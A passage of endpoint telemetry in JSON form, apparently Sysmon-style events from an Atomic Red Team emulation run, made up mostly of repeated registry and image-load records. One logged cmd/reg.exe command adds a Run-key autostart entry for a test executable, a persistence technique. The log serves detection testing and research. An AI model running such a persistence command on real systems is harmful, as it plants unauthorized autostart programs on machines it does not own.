Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": 
"C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - 
"event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - 
"timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850580000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850580000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850580000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850580000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850580000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850580000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850580000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850580000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850580000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850580000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - 
"process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850580000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850580000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850580000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850580000, - "unique_pid": 
"{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850580000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850580000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850580000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850580000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850580000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850580000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\DeleteFlag", - "registry_value": "DeleteFlag", - "timestamp": 131883570850740000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Start", - 
"registry_value": "Start", - "timestamp": 131883570850740000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", - "registry_value": "AtomicTestService", - "timestamp": 131883570850740000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"REG ADD \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /t REG_SZ /F /D C:\\Path\\AtomicRedTeam.exe\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 260, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883570852680000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00108BFF4C01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 260, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570852610000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00108BFF4C01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 260, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570852610000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00108BFF4C01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": 
"C:\\Windows\\System32\\kernel32.dll", - "pid": 260, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570852610000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00108BFF4C01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 260, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570852610000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00108BFF4C01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 260, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570852610000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00108BFF4C01}" - }, - { - "command_line": "REG ADD \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /t REG_SZ /F /D C:\\Path\\AtomicRedTeam.exe", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6156, - "ppid": 260, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}", - "unique_ppid": "{42FC7E13-CADD-5C05-0000-00108BFF4C01}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6156, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6156, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6156, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { 
- "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6156, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 6156, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 6156, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6156, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 6156, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6156, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570852770000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 